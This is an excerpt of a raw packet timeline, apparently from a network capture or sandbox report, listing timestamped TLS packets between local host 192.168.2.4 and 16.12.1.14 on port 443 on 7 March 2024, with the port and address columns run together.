                                        Mar 7, 2024 10:36:09.728647947 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.728661060 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.728673935 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.728715897 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.728738070 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.728746891 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.728967905 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.729511976 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.729536057 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.729581118 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.729603052 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.729613066 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.729641914 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.729674101 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.730482101 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.730521917 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.730566978 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.730581045 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.730603933 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.730683088 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.730691910 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.730751038 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.731717110 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.731730938 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.731756926 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.731791973 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.731802940 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.731825113 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.731843948 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.732150078 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.732194901 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.732222080 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.732232094 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.732258081 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.732275963 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.732284069 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.732332945 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.733028889 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.733042955 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.733103037 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.733114004 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.733150959 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.733150959 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.733210087 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.733279943 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.734004974 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.734019041 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.734076977 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.734081984 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.734102011 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.734147072 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.808903933 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.808937073 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.809075117 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.809104919 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.809104919 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.809174061 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.809220076 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.809297085 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.811307907 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.811321020 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.811357975 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.811386108 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.811400890 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:09.811459064 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:09.811480045 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.052926064 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.052993059 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.053030014 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.053052902 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.053076982 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.053090096 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.053137064 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.053848982 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.056132078 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.056174040 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.056205034 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.056210041 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.056232929 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.056247950 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.056273937 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.056900978 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.056941032 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.056963921 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.056968927 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.057001114 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.057014942 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.057056904 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.057996035 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.058036089 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.058058023 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.058062077 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.058088064 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.058103085 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.058109045 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.058523893 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.058619022 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.058661938 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.058680058 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.058684111 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.058710098 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.058721066 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.058731079 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.059634924 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.059672117 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.059699059 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.059703112 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.059734106 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.059748888 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.059771061 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.060300112 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.060384035 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.060425043 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.060446978 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.060451031 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.060478926 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.060493946 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.060497046 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.060621023 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.061077118 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.061116934 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.061129093 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.061134100 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.061156988 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.061167955 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.061204910 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.061844110 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.061893940 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.061906099 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.061923981 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.061949015 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.061970949 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.062014103 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.062690020 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.062727928 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.062752008 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.062756062 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.062788963 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.062820911 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.063347101 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.063385010 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.063405037 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.063409090 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.063435078 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.063452005 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.063468933 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.064003944 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.064039946 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.064062119 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.064065933 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.064090014 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.064122915 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.064136982 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.065013885 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.065051079 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.065078020 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.065083027 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.065104961 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.065125942 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.065146923 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.065730095 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.065767050 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.065793991 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.065798044 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.065820932 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.065841913 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.065865040 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.066010952 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.066497087 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.066549063 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.066572905 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.066576958 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.066601992 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.066607952 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.066662073 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.067425966 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.067473888 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.067492008 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.067497015 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.067517042 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.067538023 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.067563057 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.068886042 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.068933964 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.068949938 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.068953991 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.068989992 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.069070101 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.070100069 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.070137978 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.070166111 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.070169926 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.070194960 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.070216894 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.070228100 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.070281982 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.070944071 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.070985079 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.071007013 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.071010113 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.071058035 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.071069956 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.071084023 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.071125031 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.071960926 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.072001934 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.072033882 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.072037935 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.072074890 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.072092056 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.072094917 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.072684050 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.072719097 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.072741985 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.072746038 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.072770119 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.072792053 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.073734045 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.073746920 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.073787928 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.073802948 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.073807001 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.073829889 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.073848963 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.137465000 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.137511015 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.137599945 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.137691975 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.137720108 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.137748957 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.137765884 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.138782978 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.138823032 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.138869047 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.138880014 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.138906956 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.138930082 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.138938904 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.139538050 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.378734112 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.378793001 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.378869057 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.378896952 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.378927946 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.378953934 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.378964901 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.379308939 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.379381895 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.379432917 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.379481077 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.379517078 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.379551888 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.379602909 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.380043030 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.380054951 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.380120039 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.380132914 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.382548094 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.382920980 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.382932901 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.382971048 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.383021116 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.383033991 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.383057117 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.383090019 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.383946896 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.383960009 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.384007931 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.384025097 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.384036064 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.384063959 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.384079933 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.384874105 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.384886980 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.384916067 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.384952068 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.384963989 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.384998083 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.385016918 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.385843992 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.385857105 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.385885000 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.385931015 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.385941982 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.385967016 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.385982037 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.386739016 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.386750937 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.386780977 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.386814117 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.386826038 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.386848927 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.386867046 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.387698889 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.387711048 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.387737036 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.387793064 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.387804985 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.388534069 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.388550043 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.388606071 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.388618946 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.388644934 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.389441967 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.389452934 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.389527082 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.389538050 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.389946938 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.390235901 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.390248060 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.390279055 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.390311956 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.390322924 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.390348911 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.390384912 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.391035080 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.391047001 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.391094923 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.391117096 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.391129017 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.391151905 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.391170979 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.392167091 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.392179012 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.392195940 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.392245054 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.392257929 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.392282009 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.392299891 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.393049955 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.393066883 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.393135071 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.393146038 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.394115925 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.394170046 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.394186974 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.394198895 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.394233942 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.394270897 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.395183086 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.395195961 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.395229101 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.395258904 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.395270109 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.395296097 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.395313025 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.396229029 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.396243095 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.396276951 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.396317959 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.396330118 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.396351099 CET49729443192.168.2.416.12.1.14
